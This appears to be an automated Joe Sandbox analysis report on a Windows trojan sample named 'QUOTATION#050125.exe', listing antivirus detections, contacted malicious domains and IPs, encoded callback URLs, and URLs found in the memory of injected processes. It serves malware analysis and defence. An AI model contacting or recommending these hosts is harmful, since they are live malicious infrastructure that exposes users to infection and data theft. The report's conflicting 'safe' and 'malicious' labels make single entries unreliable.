QUOTATION#050125.exe	68%	ReversingLabs	Win32.Trojan.AutoitInject
QUOTATION#050125.exe	64%	Virustotal		Browse
QUOTATION#050125.exe	100%	Avira	DR/AutoIt.Gen8
QUOTATION#050125.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.bonheur.tech/t3iv/?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=	0%	Avira URL Cloud	safe
http://www.chiro.live/jwa9/	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.rpa.asia/bwjl/?cOnShP=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&NvA=qUwPQPTQmTwyizTU	0%	Avira URL Cloud	safe
http://www.chiro.live/jwa9/?cOnShP=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&NvA=qUwPQPTQmTwyizTU	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
http://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&NvA=qUwPQPTQmTwyizTU	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou/kj1o/	0%	Avira URL Cloud	safe
http://www.rpa.asia/bwjl/	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou	0%	Avira URL Cloud	safe
http://www.bonheur.tech/t3iv/	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
http://www.buyspeechst.shop/w98i/	0%	Avira URL Cloud	safe
http://www.buyspeechst.shop/w98i/?NvA=qUwPQPTQmTwyizTU&cOnShP=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=	0%	Avira URL Cloud	safe
http://www.zbywl.com/js.js	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/cxj4/	0%	Avira URL Cloud	safe
http://www.furrcali.xyz/k29t/	0%	Avira URL Cloud	safe
http://www.givvjn.info/nkmx/?cOnShP=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&NvA=qUwPQPTQmTwyizTU	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
http://www.nextlevel.finance/kgjj/	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
http://www70.chiro.live/	0%	Avira URL Cloud	safe
http://www.givvjn.info/nkmx/	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
http://www.mzkd6gp5.top/3u0p/?NvA=qUwPQPTQmTwyizTU&cOnShP=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=	0%	Avira URL Cloud	safe
http://www.mirenzhibo.net/wbfy/?cOnShP=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&NvA=qUwPQPTQmTwyizTU	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe	0%	Avira URL Cloud	safe
https://ogbos88vip.click	0%	Avira URL Cloud	safe
http://www.nextlevel.finance/kgjj/?NvA=qUwPQPTQmTwyizTU&cOnShP=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
http://www.bokus.site/qps0/	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q	0%	Avira URL Cloud	safe
http://www.mirenzhibo.net/wbfy/	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736408032.0024940817&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY	0%	Avira URL Cloud	safe
http://www.mzkd6gp5.top/3u0p/	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.rpa.asia	160.25.166.123	true	true	unknown
www.mirenzhibo.net	202.95.11.110	true	true	unknown
www.furrcali.xyz	103.106.67.112	true	true	unknown
www.milp.store	194.9.94.85	true	true	unknown
www.bonheur.tech	13.248.169.48	true	true	unknown
www.chiro.live	45.33.23.183	true	true	unknown
www.bokus.site	199.192.21.169	true	true	unknown
www.givvjn.info	47.83.1.90	true	true	unknown
www.mzkd6gp5.top	104.21.64.1	true	true	unknown
100millionjobs.africa	136.243.64.147	true	true	unknown
www.nextlevel.finance	76.223.54.146	true	true	unknown
www.ogbos88.cyou	172.67.132.227	true	true	unknown
www.buyspeechst.shop	104.21.64.1	true	true	unknown
www.elettrocoltura.info	unknown	unknown	false	unknown
www.100millionjobs.africa	unknown	unknown	false	unknown
www.lejgnu.info	unknown	unknown	false	unknown
www.smartbath.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.rpa.asia/bwjl/	true	Avira URL Cloud: safe	unknown
http://www.bonheur.tech/t3iv/?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=	true	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou/kj1o/	true	Avira URL Cloud: safe	unknown
http://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&NvA=qUwPQPTQmTwyizTU	true	Avira URL Cloud: safe	unknown
http://www.rpa.asia/bwjl/?cOnShP=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&NvA=qUwPQPTQmTwyizTU	true	Avira URL Cloud: safe	unknown
http://www.chiro.live/jwa9/?cOnShP=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&NvA=qUwPQPTQmTwyizTU	true	Avira URL Cloud: safe	unknown
http://www.chiro.live/jwa9/	true	Avira URL Cloud: safe	unknown
http://www.furrcali.xyz/k29t/	true	Avira URL Cloud: safe	unknown
http://www.buyspeechst.shop/w98i/	true	Avira URL Cloud: safe	unknown
http://www.bonheur.tech/t3iv/	true	Avira URL Cloud: safe	unknown
http://www.buyspeechst.shop/w98i/?NvA=qUwPQPTQmTwyizTU&cOnShP=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/nkmx/?cOnShP=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&NvA=qUwPQPTQmTwyizTU	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/cxj4/	true	Avira URL Cloud: safe	unknown
http://www.nextlevel.finance/kgjj/	true	Avira URL Cloud: safe	unknown
http://www.mirenzhibo.net/wbfy/?cOnShP=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&NvA=qUwPQPTQmTwyizTU	true	Avira URL Cloud: safe	unknown
http://www.mzkd6gp5.top/3u0p/?NvA=qUwPQPTQmTwyizTU&cOnShP=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/nkmx/	true	Avira URL Cloud: safe	unknown
http://www.bokus.site/qps0/	true	Avira URL Cloud: safe	unknown
http://www.mirenzhibo.net/wbfy/	true	Avira URL Cloud: safe	unknown
http://www.nextlevel.finance/kgjj/?NvA=qUwPQPTQmTwyizTU&cOnShP=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=	true	Avira URL Cloud: safe	unknown
http://www.mzkd6gp5.top/3u0p/	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	false		high
https://duckduckgo.com/ac/?q=	b427-I_1.5.dr	false		high
http://push.zhanzhang.baidu.com/push.js	RAVCpl64.exe, 00000004.00000002.7128342705.000000000918A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004B2A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-72.png	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou	RAVCpl64.exe, 00000004.00000002.7111211599.0000000000676000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/shared/logo/logo-loopia-white.svg	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	false		high
http://www.zbywl.com/js.js	RAVCpl64.exe, 00000004.00000002.7128342705.000000000918A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004B2A000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www70.chiro.live/	cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008FF8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004998000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-114.png	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	cmdkey.exe, 00000005.00000002.6082932285.00000000078E2000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.5.dr	false		high
https://www.furrcali.xyz/k29t/?cOnShP=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe	cmdkey.exe, 00000005.00000002.6081665064.0000000004E4E000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	b427-I_1.5.dr	false		high
https://zz.bdstatic.com/linksubmit/push.js	RAVCpl64.exe, 00000004.00000002.7128342705.000000000918A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004B2A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://ogbos88vip.click	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008CD4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004674000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/styles/reset.css	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008FF8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000004998000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-57.png	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736408032.0024940817&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY	RAVCpl64.exe, 00000004.00000002.7128342705.00000000081D6000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.0000000003B76000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	cmdkey.exe, 00000005.00000003.2814958505.000000000787A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	RAVCpl64.exe, 00000004.00000002.7128342705.0000000008044000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6081665064.00000000039E4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.6082709477.0000000005CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2921780473.000000002DDA4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
160.25.166.123	www.rpa.asia	unknown	17676	GIGAINFRASoftbankBBCorpJP	true
13.248.169.48	www.bonheur.tech	United States	16509	AMAZON-02US	true
103.106.67.112	www.furrcali.xyz	New Zealand	56030	VOYAGERNET-AS-APVoyagerInternetLtdNZ	true
194.9.94.85	www.milp.store	Sweden	39570	LOOPIASE	true
199.192.21.169	www.bokus.site	United States	22612	NAMECHEAP-NETUS	true
45.33.23.183	www.chiro.live	United States	63949	LINODE-APLinodeLLCUS	true
47.83.1.90	www.givvjn.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
172.67.132.227	www.ogbos88.cyou	United States	13335	CLOUDFLARENETUS	true
76.223.54.146	www.nextlevel.finance	United States	16509	AMAZON-02US	true
202.95.11.110	www.mirenzhibo.net	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
104.21.64.1	www.mzkd6gp5.top	United States	13335	CLOUDFLARENETUS	true
136.243.64.147	100millionjobs.africa	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586493
Start date and time:	2025-01-09 08:26:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	QUOTATION#050125.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@23/12
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 53 Number of non-executed functions: 330
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
